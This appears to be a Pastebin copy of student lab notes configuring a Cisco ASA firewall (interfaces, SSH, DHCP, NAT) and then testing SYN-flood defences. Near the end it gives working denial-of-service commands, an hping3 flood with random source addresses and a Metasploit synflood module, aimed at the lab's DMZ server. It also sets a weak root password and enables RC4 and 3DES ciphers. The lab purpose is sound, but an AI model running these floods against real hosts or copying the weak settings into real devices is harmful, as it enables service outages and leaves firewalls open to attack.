Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- en
- conf t
- hostname ASA
- domain-name team3.lab
- username root password team3 privilege 15
- crypto key generate rsa general-key modulus 2048
- write
- # Cau hinh may dieu khien
- show interface ip brief
- int Ethernet0
- ip address 192.168.56.253 255.255.255.0
- no shutdown
- nameif Management
- management-only
- security-level 100
- exit
- # Cau hinh may dich vu
- interface Ethernet2
- nameif dmz
- ip address 192.168.255.253 255.255.255.0
- no shutdown
- exit
- write
- # Cau hinh may inside
- interface Ethernet1
- nameif inside
- ip address 192.168.100.253 255.255.255.0
- no shutdown
- exit
- write
- # Cau hinh may outside
- interface Ethernet3
- nameif outside
- ip address dhcp setroute
- no shutdown
- exit
- write
- # Cau hinh SSH
- aaa authentication ssh console LOCAL
- ssh 192.168.56.0 255.255.255.0 Management
- # Update firmware
- copy tftp: flash:
- http server enable
- http 192.168.56.0 255.255.255.0 Management
- ssl encryption rc4-sha1 aes128-sha1 aes256-sha1 3des-sha1
- conf t
- asdm image flash:/asdm-762-150.bin
- exit
- write
- # Update anyconnect
- copy tftp: flash:
- 192.168.56.1
- anyconnect-win-4.4.02039.pkg
- webvpn
- anyconnect image flash:/anyconnect-win-4.4.02039.pkg
- anyconnect enable
- write
- # DHCP cho vung inside
- dhcpd address 192.168.100.101-192.168.100.200 inside
- dhcpd dns 8.8.8.8 8.8.4.4 interface inside
- dhcpd lease 28880 interface inside
- dhcpd domain team3.lab interface inside
- dhcpd option 3 ip 192.168.100.253 interface inside
- dhcpd enable inside
- # Tao Object
- object network PUBLIC_IP
- range 192.168.233.100 192.168.233.160
- exit
- object network DMZ
- subnet 192.168.255.0 255.255.255.0
- exit
- object network INTERNAL
- subnet 192.168.100.0 255.255.255.0
- exit
- # Thiet lap NAT cho vung inside
- object network INTERNAL
- nat (inside,outside) dynamic interface
- exit
- # Nat cho vung dmz
- object network WEB-SERVER
- host 192.168.255.129
- nat (dmz,outside) static interface service tcp 80 80
- exit
- object network WEB-SERVER
- host 192.168.255.129
- nat (dmz,outside) dynamic interface
- exit
- # DDos server 192.168.255.129
- -- Quet port dang bat tren server
- nmap -Pn -sS -p 80 192.168.255.129
- Hien cong 23/tcp
- -- Attack
- hping3 -S -p 80 --flood --rand-source 192.168.255.129
- # Tao access-list cho host 192.168.255.129
- access-list syn permit tcp any host 192.168.255.129 eq telnet
- access-list syn permit tcp any host 192.168.255.129 eq ssh
- access-list syn permit tcp any host 192.168.255.129 eq http
- access-list syn permit tcp any host 192.168.255.129 eq https
- # Defence firewall
- access-list syn permit tcp any 192.168.255.129 eq 23
- class-map syn
- match access-list syn
- show run service-policy
- policy-map global_policy
- class dos
- set connection embryonic-conn-max 100
- end
- show run policy-map
- show conn count
- policy-map syn
- class dos
- set connection embryonic-conn-max 10000
- conf t
- access-list syn permit tcp any host 13.0.0.1 eq telnet
- access-list syn permit tcp any host 13.0.0.1 eq ssh
- access-list syn permit tcp any host 13.0.0.1 eq http
- access-list syn permit tcp any host 13.0.0.1 eq https
- access-list syn permit tcp any host 13.0.0.1
- write
- access-group syn in interface outside
- show resource usage all
- show threat-detection rate
- # Cau hinh may dich vu
- ifconfig eth0 192.168.255.129 netmask 255.255.255.0
- route add default gw 192.168.255.253 eth0
- msfconsole
- use auxiliary/dos/tcp/synflood
- show options
- set RHOST 192.168.255.129
- exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
